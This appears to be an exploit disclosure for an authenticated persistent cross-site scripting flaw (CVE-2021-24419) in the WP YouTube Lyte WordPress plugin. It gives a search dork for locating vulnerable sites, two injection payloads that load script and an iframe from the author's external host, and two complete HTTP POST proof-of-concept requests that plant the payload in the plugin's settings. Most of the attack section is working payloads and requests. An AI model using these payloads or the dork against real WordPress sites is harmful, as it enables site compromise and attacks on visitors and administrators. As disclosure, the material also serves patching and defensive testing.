/*!
- # VULNERABILITY: WP YouTube Lyte WordPress Plugin <= 1.7.15 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/wp-youtube-lyte/
- # DATE: 2021-05-03
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Frank Goossens [ http://blog.futtta.be ]
- # SOFTWARE VERSION: <= 1.7.15
- # SOFTWARE LINK: https://wordpress.org/plugins/wp-youtube-lyte/
- # CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
- # CWE: CWE-79
- # CVE: CVE-2021-24419
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the WP YouTube Lyte plugin through v1.7.15 for WordPress.

[i] Vulnerable parameter(s): &lyte_notification=, &lyte_yt_api_key=.



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] "><script src=//m0ze.ru/payload/a.js></script><div x

[$] "><iframe src=https://m0ze.ru/payload/xfsii.html></iframe><div x



### -- [ PoC #1 | Authenticated Persistent XSS | Your YouTube API key: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=&lyte_yt_api_key=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0



### -- [ PoC #2 | Authenticated Persistent XSS | &lyte_notification: ]

[!] POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_yt_api_key=&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze